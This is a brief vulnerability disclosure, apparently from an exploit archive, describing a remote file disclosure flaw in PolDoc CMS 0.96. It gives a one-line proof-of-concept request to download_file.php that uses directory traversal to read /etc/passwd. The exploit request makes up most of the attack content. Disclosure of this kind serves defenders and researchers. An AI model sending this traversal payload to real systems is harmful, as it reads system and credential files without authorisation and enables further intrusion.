PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272 POC : /download_file.php?filename=../../../../../../../../etc/passwd